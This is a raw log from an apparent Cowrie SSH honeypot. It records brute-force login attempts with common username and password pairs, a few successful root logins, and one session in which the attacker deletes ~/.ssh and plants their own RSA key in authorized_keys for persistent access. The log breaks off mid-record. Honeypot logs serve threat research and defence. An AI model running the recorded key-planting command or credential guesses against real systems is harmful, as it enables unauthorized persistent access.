{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:49:40.037460Z","src_ip":"199.195.248.191","session":"639d028b00d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:49:40.391009Z","src_ip":"199.195.248.191","session":"639d028b00d9"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:40.479726Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:40.480871Z","src_ip":"199.195.248.191","session":"639d028b00d9"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":58198,"dst_ip":"1.2.3.4","dst_port":22,"session":"c095f8016eb7","protocol":"ssh","message":"New connection: 217.154.1.158:58198 (1.2.3.4:22) [session: c095f8016eb7]","sensor":"my-vps","timestamp":"2025-08-26T19:49:45.377407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:49:45.378394Z","src_ip":"217.154.1.158","session":"c095f8016eb7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:49:45.392562Z","src_ip":"217.154.1.158","session":"c095f8016eb7"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-26T19:49:45.435093Z","src_ip":"217.154.1.158","session":"c095f8016eb7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:46.457068Z","src_ip":"217.154.1.158","session":"c095f8016eb7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56718,"dst_ip":"1.2.3.4","dst_port":22,"session":"57c439daaa8d","protocol":"ssh","message":"New connection: 217.154.1.158:56718 (1.2.3.4:22) [session: 57c439daaa8d]","sensor":"my-vps","timestamp":"2025-08-26T19:50:03.008494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:50:03.010609Z","src_ip":"217.154.1.158","session":"57c439daaa8d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:50:03.029726Z","src_ip":"217.154.1.158","session":"57c439daaa8d"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-26T19:50:03.075092Z","src_ip":"217.154.1.158","session":"57c439daaa8d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:04.091712Z","src_ip":"217.154.1.158","session":"57c439daaa8d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52862,"dst_ip":"1.2.3.4","dst_port":22,"session":"67de4c50bb1b","protocol":"ssh","message":"New connection: 217.154.1.158:52862 (1.2.3.4:22) [session: 67de4c50bb1b]","sensor":"my-vps","timestamp":"2025-08-26T19:50:20.472846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:50:20.473931Z","src_ip":"217.154.1.158","session":"67de4c50bb1b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:50:20.488333Z","src_ip":"217.154.1.158","session":"67de4c50bb1b"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T19:50:20.586751Z","src_ip":"217.154.1.158","session":"67de4c50bb1b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:21.602540Z","src_ip":"217.154.1.158","session":"67de4c50bb1b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49902,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0c482aa3f6e","protocol":"ssh","message":"New connection: 217.154.1.158:49902 (1.2.3.4:22) [session: d0c482aa3f6e]","sensor":"my-vps","timestamp":"2025-08-26T19:50:37.900489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:50:37.901673Z","src_ip":"217.154.1.158","session":"d0c482aa3f6e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:50:37.932970Z","src_ip":"217.154.1.158","session":"d0c482aa3f6e"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:50:37.979934Z","src_ip":"217.154.1.158","session":"d0c482aa3f6e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:38.997339Z","src_ip":"217.154.1.158","session":"d0c482aa3f6e"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":57550,"dst_ip":"1.2.3.4","dst_port":22,"session":"00b4999c6a6e","protocol":"ssh","message":"New connection: 199.195.248.191:57550 (1.2.3.4:22) [session: 00b4999c6a6e]","sensor":"my-vps","timestamp":"2025-08-26T19:50:41.943550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:50:41.953766Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:50:42.039009Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123ABC!@#","message":"login attempt [root/abc123ABC!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:50:42.396627Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:50:42.604064Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:50:42.604753Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:50:42.605886Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:42.697029Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:50:42.976677Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:50:42.977403Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:50:43.068349Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:43.069258Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":58070,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e0cc8431d90","protocol":"ssh","message":"New connection: 199.195.248.191:58070 (1.2.3.4:22) [session: 4e0cc8431d90]","sensor":"my-vps","timestamp":"2025-08-26T19:50:43.153731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:50:43.163443Z","src_ip":"199.195.248.191","session":"4e0cc8431d90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:50:43.248936Z","src_ip":"199.195.248.191","session":"4e0cc8431d90"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:50:43.617120Z","src_ip":"199.195.248.191","session":"4e0cc8431d90"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:44.706124Z","src_ip":"199.195.248.191","session":"4e0cc8431d90"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":58882,"dst_ip":"1.2.3.4","dst_port":22,"session":"854e29969588","protocol":"ssh","message":"New connection: 199.195.248.191:58882 (1.2.3.4:22) [session: 854e29969588]","sensor":"my-vps","timestamp":"2025-08-26T19:50:44.791501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:50:44.794601Z","src_ip":"199.195.248.191","session":"854e29969588"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:50:44.888938Z","src_ip":"199.195.248.191","session":"854e29969588"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:50:45.256508Z","src_ip":"199.195.248.191","session":"854e29969588"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:45.348478Z","src_ip":"199.195.248.191","session":"00b4999c6a6e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:50:45.349710Z","src_ip":"199.195.248.191","session":"854e29969588"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53646,"dst_ip":"1.2.3.4","dst_port":22,"session":"4936f2725580","protocol":"ssh","message":"New connection: 217.154.1.158:53646 (1.2.3.4:22) [session: 4936f2725580]","sensor":"my-vps","timestamp":"2025-08-26T19:50:55.513241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:50:55.514153Z","src_ip":"217.154.1.158","session":"4936f2725580"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"